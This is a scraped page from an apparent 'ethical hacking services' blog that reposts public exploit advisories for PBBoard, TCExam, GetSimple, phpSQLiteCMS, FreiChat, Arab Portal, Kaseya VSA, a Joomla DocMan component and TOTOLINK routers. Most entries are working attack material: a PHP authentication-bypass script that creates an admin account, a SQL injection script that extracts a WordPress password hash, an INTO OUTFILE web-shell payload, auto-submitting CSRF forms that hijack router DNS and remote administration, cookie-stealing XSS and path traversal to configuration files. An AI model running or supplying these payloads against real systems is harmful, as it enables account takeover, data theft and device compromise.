Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863152458

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/54862/info

PBBoard is a web-based messaging board application implemented in PHP.

Attackers may exploit these issues to gain unauthorized access to user accounts or to bypass intended security restrictions. Other attacks may also be possible.

PBBoard versions prior to 2.1.4 are vulnerable.
http://drupal.org/node/207891 

<?
/*
+ Application : Power Bulletin Board < 2.1.4
| Download : pbboard.com
| By Faris , AKA i-Hmx
| n0p1337@gmail.com
+ sec4ever.com , 1337s.cc

Time line :
 > 14/7/2012 , Vulnerability discovered
 > 30/7/2012 , Vendor Reported
 > 31/7/2012 , patch released
 > 01/8/2012 , Public disclosure
 

engine/engine.class.php
 		$this->_CONF['admin_username_cookie']	=	'PowerBB_admin_username';
 		$this->_CONF['admin_password_cookie']	=	'PowerBB_admin_password';
admin/common.module.php
		if (!empty($username)
			and !empty($password))
		{
			$CheckArr 				= 	array();
			$CheckArr['username'] 	= 	$username;
			$CheckArr['password'] 	= 	$password;

			$CheckMember = $PowerBB->member->CheckAdmin($CheckArr);

			if ($CheckMember != false)
			{
				$PowerBB->_CONF['rows']['member_row'] = 	$CheckMember;
				$PowerBB->_CONF['member_permission'] 	= 	true;
			}
			else
			{
				$PowerBB->_CONF['member_permission'] = false;
			}

		}
Function CheckAdmin is called from
engine/systyms/member.class.php
go deeper and deeper till u find the vulnerable query
this can be used to bypass login rules as cookies are not sanitized before being called for login confirmation
*/
echo "\n+-------------------------------------------+\n";
echo "|          PBulletin Board < 2.1.4          |\n";
echo "|    Auth Bypass vuln / Admin add Exploit   |\n";
echo "|                  By i-Hmx                 |\n";
echo "|             n0p1337@gmail.com             |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target # ";
function get($url,$post,$cookies){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,"http://".$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl,CURLOPT_COOKIE,$cookies);
//curl_setopt($curl, CURLOPT_REFERER, $reffer);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true); 
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
		$string = " ".$string;
		$ini = strpos($string,$start);
		if ($ini == 0) return "";
		$ini += strlen($start);
		$len = strpos($string,$end,$ini) - $ini;
		return substr($string,$ini,$len);
}
$vic=str_replace('http://','',trim(fgets(STDIN)));
if($vic==''){exit();}
$log=fopen('faris.txt','w+');
$ran=rand(10000,20000);
echo "| Adding New User\n";
$add=get($vic.'/admin.php?page=member&add=1&start=1',"username=f4ris_$ran&password=sec4ever1337s&email=n0p1337_$ran@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
$myid=kastr($add,'main=1&id=','">');
if($myid==''){exit("| Exploitation Failed\n   - Magic_Quotes Maybe on or wrong path\n+ Exit");}
echo "| User Data :\n   + UserName : f4ris_$ran\n   + Password : sec4ever1337s\n   + User ID : $myid\n";
echo "| Updating User privileges\n";
$update=get($vic."admin.php?page=member&edit=1&start=1&id=$myid","username=f4ris_$ran&new_username=f4ris_$ran&new_password=sec4ever1337s&email=n0p1337_$ran@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
echo "+ Exploitatin Done ;)\n";
exit();
?>
HireHackking 
source: https://www.securityfocus.com/bid/54861/info
 
TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
 
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
 
Versions prior to TCExam 11.3.008 are vulnerable. 

http://www.example.com/admin/code/tce_edit_question.php?subject_module_id
HireHackking 
source: https://www.securityfocus.com/bid/54861/info

TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Versions prior to TCExam 11.3.008 are vulnerable. 

http://www.example.com/admin/code/tce_edit_answer.php?subject_module_id
http://www.example.com/admin/code/tce_edit_answer.php?question_subject_id
HireHackking 
source: https://www.securityfocus.com/bid/54866/info

GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

GetSimple 3.1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/cms/admin/filebrowser.php?path=[LFI]
HireHackking

phpSQLiteCMS - Multiple Vulnerabilities

HACKER · %s · %s

# Exploit Title: CSRF, Unrestricted File Upload, Privilege escalation & XSS # Google Dork: intitle: CSRF, Unrestricted File Upload, Privilege escalation & XSS # Date: 2015-07-12 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: phpsqlitecms.net # Software Link: phpsqlitecms.net/download # Version: ilosuna-phpsqlitecms-d9b8219 # Tested on: windows 7 SP1 # Category: Web apps CMS Vendor: ================================ phpsqlitecms.net Product: ================================ ilosuna-phpsqlitecms-d9b8219 Advisory Information: ============================================================================== CSRF, Unrestricted File type upload, Privilege escalation & XSS Vulnerabilities. User will be affected if they visit a malicious website or click any infected link. Possibly resulting in malicious attackers taking control of the Admin / CMS area. Vulnerability Details: ===================== CSRF: ----- We can add arbitrary users to the system, delete arbitrary web server files and escalate privileges, as no CSRF token is present. Add arbitrary user: ------------------- The following request variables are all that is needed to add users to system. mode = users new_user_submitted = true name = "hyp3rlinx" pw = "12345" pw_r = "12345" Privilege escalation: --------------------- Under users area in admin we can easily gain admin privileges, again using CSRF vulnerability we submit form using our id and change request variable to type '1' granting us admin privileges. e.g. mode:users edit_user_submitted:true id:3 name:hyp3rlinx new_pw: new_pw_r: type:1 <------make us admin Delete arbitrary files: ------------------------ The following request parameters are all we is need to delete files from media or files directorys under the web servers CMS area. mode=filemanager directory=files delete=index.html confirmed=true XSS: ----- We can steal PHP session cookie via XSS vulnerability Unrestricted File Type Upload: ------------------------------ The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts when selected will execute whatever PHP script we upload. Exploit code(s): =============== 1- CSRF POC Add arbitrary users to the system. --------------------------------------------- <script> function doit(){ var e=document.getElementById('evil') e.submit() } </script> </head> <body onLoad="doit()"> <form id="evil" action=" http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php" method="post"> <input type="text" name="mode" value="users"/> <input type="text" name="new_user_submitted" value="true"/> <input type="text" name="name" value="hyp3rlinx" /> <input type="text" name="pw" value="abc123" /> <input type="text" name="pw_r" value="abc123" /> </form> 2- CSRF privilege escalation POST URL: -------------------------------------- http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php Privilege escalation request string: ------------------------------------ mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1 3- CSRF Delete Aribitary Server Files: -------------------------------------- Below request URL will delete the index.html file in files dir on web server without any type of request validation CSRF token etc. http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager &directory=files&delete=index.html&confirmed=true XSS steal PHP session ID POC: ----------------------------- http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0& edit=49&comment_id="/><script>alert('XSS by hyp3rlinx '%2bdocument.cookie)</script>&page=1 Disclosure Timeline: ========================================================= Vendor Notification: NA July 12, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] POST & GET Vulnerable Product: [+] ilosuna-phpsqlitecms-d9b8219 Vulnerable Parameter(s): [+] comment_id, delete, type, new_user_submitted Affected Area(s): [+] Admin & CMS =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
HireHackking
source: https://www.securityfocus.com/bid/54881/info The ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities. An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete, or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. ConcourseSuite version 6.1 (20120209) is vulnerable; other versions may also be affected. http://www.example.com/crm/Sales.do?nameFirst&nameLast http://www.example.com/crm/ExternalContacts.do?nameFirst&nameLast&company http://www.example.com/crm/Accounts.do?name http://www.example.com/crm/MyCFSProfile.do?address1state
HireHackking

FreiChat 9.6 - SQL Injection

HACKER · %s · %s

/* # Exploit Title: FreiChat 9.6 SQL Injection # Date: 27-11-2014 # Software Link: http://codologic.com/page/freichat-free-php-chat-script-software # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description $_GET['time'] is not escaped. File: freichat\server\plugins\chatroom\chatroom.php $get_mesg = $this->get_messages($_GET['time']); public function get_messages($time) { $frm_id = $this->frm_id; $result = array(); if ($time == 0) { //$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time"; } else { $get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time "; $result = $this->db->query($get_mesg_query)->fetchAll(); } return $result; } http://security.szurek.pl/freichat-96-sql-injection.html 2. Proof of Concept Example for WordPress integration (it will give you admin password): */ <?php /* * Kacper Szurek * http://security.szurek.pl */ function hack($url, $cookie, $sql ){ $ckfile = dirname(__FILE__) . $cookie; $cookie = fopen($ckfile, 'w') or die("Cannot create cookie file"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) { curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]); $content = curl_exec($ch); curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql)); $content = curl_exec($ch); if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) { echo "WordPress password user ID=1: ".$output[1]; } else { echo "FAIL"; } } curl_close( $ch ); } // URL to WordPress main URL $url = "http://wp/"; // SQL Payload $sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- "; $cookie = "/cookie.txt"; hack($url, $cookie, $sql);
HireHackking

Arab Portal 3 - SQL Injection

HACKER · %s · %s

## In The Name Of ALLAH ## # title : Arabportal 3 SQL injection vulnerability # Exploit Title: Arabportal 3 registeration section SQL injection vulnerability # Google Dork: inurl:members.php?action=signup # Date: 2015/07/10 (july 10th) # Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com) # Vendor Homepage: www.arabportal.net # Software Link: www.arabportal.net # Version: 3 # Tested on: linux # greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 members.php?action=singup POST parameter "showemail" is vulnerable to error based SQLi attack ................................................................................ 1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady video : https://youtu.be/5nFblYE90Vk good luck
HireHackking

PBBoard - 'index.php' Multiple SQL Injections

HACKER · %s · %s

source: https://www.securityfocus.com/bid/54916/info PBBoard is prone to multiple security vulnerabilities including: 1. Multiple SQL-injection vulnerabilities 2. A security-bypass vulnerability 3. An arbitrary file upload vulnerability Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application. PBBoard 2.1.4 is vulnerable; other versions may also be affected. <form action="http://www.example.com/index.php?id=1&member=1&page=send&start=1" method="post" name="main" id="main"> <input type="hidden" name="username" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- "> <input type="submit" name="Submit" value="Send"> </form> <form action="http://www.example.com/index.php?page=forget&send_active_code=1" method="post" name="main" id="main"> <input type="hidden" name="email" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- "> <input type="submit" name="Submit" value="Send"> </form> <form action="http://www.example.com/index.php?page=forum_archive&password_check=1&id=1" method="post" name="main" id="main"> <input type="hidden" name="password" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- "> <input type="submit" name="Submit" value="Send"> </form> <form action="http://www.example.com/index.php?page=management&move=1&subject_id=1" method="post" name="main" id="main"> <input type="hidden" name="section" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- "> <input type="submit" name="Submit" value="Send"> </form> <form action="http://www.example.com/index.php?page=managementreply&startdeleteposts=1&do_replys=1" method="post" name="main" id="main"> <input type="hidden" name="section_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- "> <input type="hidden" name="check[]" value="1"> <input type="submit" name="Submit" value="Send"> </form> <form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main"> <input type="hidden" name="member_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- "> <input type="hidden" name="new_password" value="1"> <input type="submit" name="Submit" value="Send"> </form> <form action="http://www.example.com/index.php?page=tags&start=1" method="post" name="main" id="main"> <input type="hidden" name="subjectid" value="' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- "> <input type="submit" name="Submit" value="Send"> </form>
HireHackking

PBBoard - 'member_id' Validation Password Manipulation

HACKER · %s · %s

source: https://www.securityfocus.com/bid/54916/info PBBoard is prone to multiple security vulnerabilities including: 1. Multiple SQL-injection vulnerabilities 2. A security-bypass vulnerability 3. An arbitrary file upload vulnerability Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application. PBBoard 2.1.4 is vulnerable; other versions may also be affected. <form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main"> <input type="hidden" name="member_id" value="1"> <input type="hidden" name="new_password" value="new_password"> <input type="submit" name="Submit" value="Send"> </form>
HireHackking
>> Multiple vulnerabilities in Kaseya Virtual System Administrator >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 13/07/2015 / Last updated: 28/09/2015 >> Background on the affected product: "Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show." A special thanks to CERT and ZDI for assisting with the vulnerability reporting process. These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015. >> Technical details: #1 Vulnerability: Arbitary file download (authenticated) CVE-2015-2862 / CERT ID 919604 Affected versions: unknown, at least v7 to v9.1 GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini Referer: http://10.0.0.3/ A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal. This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\). #2 Vulnerability: Open redirect (unauthenticated) CVE-2015-2863 / CERT ID 919604 Affected versions: unknown, at least v7 to v9.1 a) http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com b) GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com Host: www.google.com (host header has to be spoofed to the target) >> Fix: R9.1: install patch 9.1.0.4 R9.0: install patch 9.0.0.14 R8.0: install patch 8.0.0.18 V7.0: install patch 7.0.0.29 >> References: [1] https://www.kb.cert.org/vuls/id/919604 ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>
HireHackking

Joomla! Component com_docman - Multiple Vulnerabilities

HACKER · %s · %s

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman # Google Dork: inurl:"/components/com_docman/dl2.php" # Xploit (FPD): Get one target and just download with blank parameter: http://www.site.com/components/com_docman/dl2.php?archive=0&file= In title will occur Full Path Disclosure of server. # Xploit (LFD/LFI): http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF] Let's Xploit... First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64: ../../../../../../../target/www/configuration.php <= Not Ready http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready ! And Now we have a configuration file...
HireHackking
## Advisory Information Title: 4 TOTOLINK router models vulnerable to CSRF and XSS attacks Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x01.txt Blog URL: http://pierrekim.github.io/blog/2015-07-16-4-TOTOLINK-products-vulnerable-to-CSRF-and-XSS-attacks.html Date published: 2015-07-16 Vendors contacted: None Release mode: Released, 0day CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerability Summary TOTOLINK iPuppy, iPuppy3, N100RE and N200RE are wireless LAN routers. Their current firmwares with default configuration are vulnerable to CSRF-attacks and XSS attacks. Since, the anti-CSRF protection is based on a static HTTP referrer (RFC 1945), an attacker can take over most of the configuration and settings using anyone inside the LAN of the router. Owners are urged to contact TOTOLINK, and activate authentication on this product (disabled by default). It affects (firmware come from totolink.net and from totolink.cn): TOTOLINK iPuppy : firmware 1.2.1 (TOTOLINK iPuppy__V1.2.1.update) TOTOLINK iPuppy3 : firmware 1.0.2 (TOTOLINK iPuppy3_V1.0.2.update) TOTOLINK N100RE-V1 : firmware V1.1-B20140723-2-432-EN (TOTOLINK-N100RE-IP04216-RT5350-SPI-1M8M-V1.1-B20140723-2-432-EN.update) TOTOLINK N200RE : firmware V1.4-B20140724-2-457-EN (TOTOLINK-N200RE-IP04220-MT7620-SPI-1M8M-V1.4-B20140724-2-457-EN.update) ## Details - CSRF The HTTP interface allows to edit the configuration. This interface is vulnerable to CSRF. Configuration and settings can be modified with CSRF attacks: Activate the remote control management Change the DNS configuration Update the firmware Change the Wifi Configuration Create TCP redirections to the LAN and more... Example of forms exploiting the CSRF: o Activating the remote control management on port 31337/tcp listening on the WAN interface. <html> <head> <script> function s() { document.f.submit(); } </script> </head> <body onload="s()"> <form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm"> <input type="hidden" name="CMD" value="SYS"> <input type="hidden" name="GO" value="firewallconf_accesslist.html"> <input type="hidden" name="nowait" value="1"> <input type="hidden" name="SET0" value="17367296=31337"> <input type="hidden" name="SET1" value="17236224=1"> </form> </body> </html> o Changing the DNS configuration to 0.2.0.7 and 1.2.0.1: <html> <head> <script> function s() { document.f.submit(); } </script> </head> <body onload="s()"> <form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm"> <input type="hidden" name="CMD" value="WAN"> <input type="hidden" name="GO" value="netconf_wansetup.html"> <input type="hidden" name="SET0" value="50397440=2"> <input type="hidden" name="SET1" value="50856960=64-E5-99-AA-AA-AA"> <input type="hidden" name="SET2" value="235077888=1"> <input type="hidden" name="SET3" value="235012865=0.2.0.7"> <input type="hidden" name="SET4" value="235012866=1.2.0.1"> <input type="hidden" name="SET5" value="51118336=0"> <input type="hidden" name="SET6" value="51839232=1"> <input type="hidden" name="SET7" value="51511552=1500"> <input type="hidden" name="SET8" value="117834240="> <input type="hidden" name="SET9" value="117703168="> <input type="hidden" name="SET10" value="117637376=1492"> <input type="hidden" name="SET11" value="51446016=1500"> <input type="hidden" name="SET12" value="50463488=192.168.1.1"> <input type="hidden" name="SET13" value="50529024=255.255.255.0"> <input type="hidden" name="SET14" value="50594560=192.168.1.254"> </form> </body> </html> The variable GO is an open redirect. Any URL like http://www.google.com/ for instance can be used. The variable GO is also vulnerable to XSS. It's out of scope in this advisory. To bypass the protection (which checks the refer), you can, for example, base64 the form and include it in the webpage. The refer will be empty and the CSRF will be accepted by the device: o activate_admin_wan_csrf_bypass.html: <html> <head> <meta http-equiv="Refresh" content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iU1lTIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJmaXJld2FsbGNvbmZfYWNjZXNzbGlzdC5odG1sIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ibm93YWl0IiB2YWx1ZT0iMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDAiIHZhbHVlPSIxNzM2NzI5Nj0zMTMzNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSIxNzIzNjIyND0xIj4KPC9mb3JtPgo8L2JvZHk+CjwvaHRtbD4K"> </head> <body> </body> </html> Visiting activate_admin_wan_csrf_bypass.html in a remote location will activate the remote management interface on port 31337/TCP. You can test it through http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-change_dns_csrf_bypass.html o change_dns_csrf_bypass.html: <html> <head> <meta http-equiv="Refresh" content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iV0FOIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJuZXRjb25mX3dhbnNldHVwLmh0bWwiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJTRVQwIiB2YWx1ZT0iNTAzOTc0NDA9MiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSI1MDg1Njk2MD02NC1FNS05OS1BQS1BQS1BQSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDIiIHZhbHVlPSIyMzUwNzc4ODg9MSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDMiIHZhbHVlPSIyMzUwMTI4NjU9MC4yLjAuNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDQiIHZhbHVlPSIyMzUwMTI4NjY9MS4yLjAuMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDUiIHZhbHVlPSI1MTExODMzNj0wIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUNiIgdmFsdWU9IjUxODM5MjMyPTEiPgo8aW5wdXQgdHlwZT0iaGlkZGVu IiBuYW1lPSJTRVQ3IiB2YWx1ZT0iNTE1MTE1NTI9MTUwMCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDgiIHZhbHVlPSIxMTc4MzQyNDA9Ij4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUOSIgdmFsdWU9IjExNzcwMzE2OD0iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJTRVQxMCIgdmFsdWU9IjExNzYzNzM3Nj0xNDkyIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUMTEiIHZhbHVlPSI1MTQ0NjAxNj0xNTAwIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUMTIiIHZhbHVlPSI1MDQ2MzQ4OD0xOTIuMTY4LjEuMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEzIiB2YWx1ZT0iNTA1MjkwMjQ9MjU1LjI1NS4yNTUuMCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDE0IiB2YWx1ZT0iNTA1OTQ1NjA9MTkyLjE2OC4xLjI1NCI+CjwvZm9ybT4KPC9ib2R5Pgo8L2h0bWw+Cg=="> </head> <body> </body> </html> Visiting activate_admin_wan_csrf_bypass.html in a remote location will change the DNS servers provided by the TOTOLINK device in the LAN. You can test it through http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-activate_admin_wan_csrf_bypass.html ## Details - stored XSS and fun There is a stored XSS, which can be injected using UPNP from the LAN, without authentication: upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping Required argument: Argument Name: NewPortMappingDescription Data Type: string Allowed Values: [] Set NewPortMappingDescription value to: <script>alert("XSS");</script> Required argument: Argument Name: NewLeaseDuration Data Type: ui4 Allowed Values: [] Set NewLeaseDuration value to: 0 Required argument: Argument Name: NewInternalClient Data Type: string Allowed Values: [] Set NewInternalClient value to: <script>alert("XSS");</script> Required argument: Argument Name: NewEnabled Data Type: boolean Allowed Values: [] Set NewEnabled value to: 1 Required argument: Argument Name: NewExternalPort Data Type: ui2 Allowed Values: [] Set NewExternalPort value to: 80 Required argument: Argument Name: NewRemoteHost Data Type: string Allowed Values: [] Set NewRemoteHost value to: <script>alert("XSS");</script> Required argument: Argument Name: NewProtocol Data Type: string Allowed Values: ['TCP', 'UDP'] Set NewProtocol value to: TCP Required argument: Argument Name: NewInternalPort Data Type: ui2 Allowed Values: [] Set NewInternalPort value to: 80 upnp> The UPNP webpage in the administration area (http://192.168.0.1/popup_upnp_portmap.html) will show: [...] <tr> <td class=item_td>TCP</td> <td class=item_td>21331</td> <td class=item_td><script>alert("XSS")<script>alert("XSS");</script>:28777</td> <td class=item_td><script>alert("XSS");</script></td> </tr> [...] - From my research, there are some bits overflapping with others, resulting in showing funny ports and truncating input data. A remote DoS against the upnpd process seems to be easily done. Gaining Remote Code Execution by UPNP exploitation is again left as a exercise for the reader. ## Vendor Response Due to "un-ethical code" found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted in regard of this case. ## Report Timeline * Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices. * Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs. * Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking for similar ipTIME products. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by 